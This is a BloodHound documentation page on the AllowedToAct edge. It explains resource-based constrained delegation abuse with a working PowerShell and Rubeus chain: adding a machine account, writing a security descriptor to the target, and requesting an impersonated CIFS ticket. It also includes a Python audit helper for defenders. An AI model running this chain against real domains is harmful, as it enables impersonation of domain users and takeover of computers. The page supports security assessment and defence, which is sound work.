
# AllowedToAct

> This edge allows an attacker to abuse resource-based constrained delegation (RBCD) to compromise the target. The underlying property, msDS-AllowedToActOnBehalfOfOtherIdentity, is a binary security descriptor whose DACL controls which security principals may impersonate any domain user to this particular computer object.

<img noZoom src="https://mintcdn.com/specterops/tTIczgde9H07oLXf/assets/enterprise-AND-community-edition-pill-tag.svg?fit=max&auto=format&n=tTIczgde9H07oLXf&q=85&s=ad49a576589f4d2a8081df77d07fdf56" alt="Applies to BloodHound Enterprise and CE" width="482" height="45" data-path="assets/enterprise-AND-community-edition-pill-tag.svg" />

An attacker can execute a modified S4U2self/S4U2proxy abuse chain to impersonate any domain user to the target computer system and receive a valid service ticket “as” this user.

One caveat is that impersonated users cannot be members of the “Protected Users” security group or otherwise have delegation privileges revoked. Another caveat is that the principal added to the msDS-AllowedToActOnBehalfOfOtherIdentity DACL *must* have a service principal name (SPN) set in order to successfully abuse the S4U2self/S4U2proxy process. If an attacker does not currently control an account with an SPN set, they can abuse the default domain MachineAccountQuota setting to add a computer account under their control using the Powermad project.

**Abuse Info**

Abusing this primitive is currently possible through the Rubeus project.

First, if an attacker does not control an account with an SPN set, Kevin Robertson’s Powermad project can be used to add a new attacker-controlled computer account:

```powershell
New-MachineAccount -MachineAccount attackersystem -Password $(ConvertTo-SecureString 'Summer2018!' -AsPlainText -Force)
```

PowerView can then be used to retrieve the security identifier (SID) of the newly created computer account:

```powershell
$ComputerSid = Get-DomainComputer attackersystem -Properties objectsid | Select -Expand objectsid
```

We now need to build a generic ACE with the attacker-added computer SID as the principal, and get the binary bytes for the new DACL/ACE:

```powershell
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($ComputerSid))"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
```

Next, we need to set this newly created security descriptor in the msDS-AllowedToActOnBehalfOfOtherIdentity field of the computer account we’re taking over, again using PowerView in this case:

```powershell
Get-DomainComputer $TargetComputer | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
```

We can then use Rubeus to hash the plaintext password into its RC4_HMAC form:

```powershell
Rubeus.exe hash /password:Summer2018!
```

Finally, we can use Rubeus’ *s4u* module to request a service ticket for the target service name (sname) while impersonating “admin”. The ticket is injected into the current logon session (thanks to /ptt) and, in this case, grants access to the file system of TARGETCOMPUTER over CIFS:

```powershell
Rubeus.exe s4u /user:attackersystem$ /rc4:EF266C6B963C0BB683941032008AD47F /impersonateuser:admin /msdsspn:cifs/TARGETCOMPUTER.testlab.local /ptt
```
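As an added example (not part of the BloodHound documentation or of any project it references), the following Python builds the same self-relative security descriptor that the `RawSecurityDescriptor`/`GetBinaryForm` step above produces and, more usefully for a defender, decodes one back into the trustee SIDs it grants, which is how msDS-AllowedToActOnBehalfOfOtherIdentity values pulled from the directory can be audited for unexpected principals. All SIDs are constructed; `BA` in the page's SDDL is the well-known Administrators SID S-1-5-32-544.

```python
import struct

# Access mask encoded by the page's SDDL rights string CCDCLCSWRPWPDTLOCRSDRCWDWO
GENERIC_ALL_DS = 0x000F01FF
ACCESS_ALLOWED_ACE_TYPE = 0x00
SE_DACL_PRESENT, SE_SELF_RELATIVE = 0x0004, 0x8000

def sid_to_bytes(sid: str) -> bytes:
    """Pack an 'S-1-5-...' string into the binary SID layout."""
    parts = sid.split("-")
    revision, authority, subs = int(parts[1]), int(parts[2]), [int(p) for p in parts[3:]]
    return (struct.pack("<BB", revision, len(subs)) + authority.to_bytes(6, "big")
            + b"".join(struct.pack("<I", s) for s in subs))

def sid_from_bytes(data: bytes, off: int) -> str:
    """Decode the binary SID that starts at offset `off`."""
    revision, count = data[off], data[off + 1]
    authority = int.from_bytes(data[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, data, off + 8)
    return "S-%d-%d" % (revision, authority) + "".join("-%d" % s for s in subs)

def build_rbcd_sd(trustee_sid: str, owner_sid: str = "S-1-5-32-544") -> bytes:
    """Constructed self-relative descriptor equivalent to the page's SDDL
    'O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;<trustee>)' (BA = S-1-5-32-544)."""
    sid = sid_to_bytes(trustee_sid)
    ace = struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), GENERIC_ALL_DS) + sid
    acl = struct.pack("<BBHHH", 2, 0, 8 + len(ace), 1, 0) + ace   # ACL_REVISION = 2, one ACE
    owner = sid_to_bytes(owner_sid)
    # 20-byte header: revision, sbz1, control, then offsets of owner, group, SACL, DACL
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner))
    return header + owner + acl

def rbcd_trustees(sd: bytes) -> list:
    """Audit helper: (trustee SID, access mask) for every ACCESS_ALLOWED ACE in the
    DACL of an msDS-AllowedToActOnBehalfOfOtherIdentity value read from AD."""
    control, dacl_off = struct.unpack_from("<H", sd, 2)[0], struct.unpack_from("<I", sd, 16)[0]
    if not control & SE_DACL_PRESENT or dacl_off == 0:
        return []                       # no DACL: nobody may act on behalf of others
    ace_count = struct.unpack_from("<H", sd, dacl_off + 4)[0]
    off, found = dacl_off + 8, []
    for _ in range(ace_count):
        ace_type, _flags, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            mask = struct.unpack_from("<I", sd, off + 4)[0]
            found.append((sid_from_bytes(sd, off + 8), mask))
        off += ace_size                 # skip deny/object ACEs by their declared size
    return found
```

Any trustee returned by `rbcd_trustees` that is not a known, intended delegation principal (or a SID that resolves to a recently created computer account) is worth investigating.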

See a video walkthrough of how to execute this attack: [BloodHound 2.1's New Computer Takeover Attack](https://www.youtube.com/watch?v=RUbADHcBLKg)

## Opsec Considerations

To execute this attack, the Rubeus C# assembly must run on a system that can send and receive traffic within the domain.

## Edge Schema

Source: [User](/resources/nodes/user), [Group](/resources/nodes/group), [Computer](/resources/nodes/computer)\
Destination: [Computer](/resources/nodes/computer)\
Traversable: **Yes**

## References

* [https://eladshamir.com/2019/01/28/Wagging-the-Dog.html](https://eladshamir.com/2019/01/28/Wagging-the-Dog.html)
* [https://github.com/GhostPack/Rubeus#s4u](https://github.com/GhostPack/Rubeus#s4u)
* [https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff](https://gist.github.com/HarmJ0y/224dbfef83febdaf885a8451e40d52ff)
* [https://blog.harmj0y.net/redteaming/another-word-on-delegation/](https://blog.harmj0y.net/redteaming/another-word-on-delegation/)
* [https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1](https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1)
* [https://github.com/Kevin-Robertson/Powermad#new-machineaccount](https://github.com/Kevin-Robertson/Powermad#new-machineaccount)
* [https://specterops.io/blog/2019/03/12/bloodhound-2-1-the-fix-broken-stuff-update/](https://specterops.io/blog/2019/03/12/bloodhound-2-1-the-fix-broken-stuff-update/)
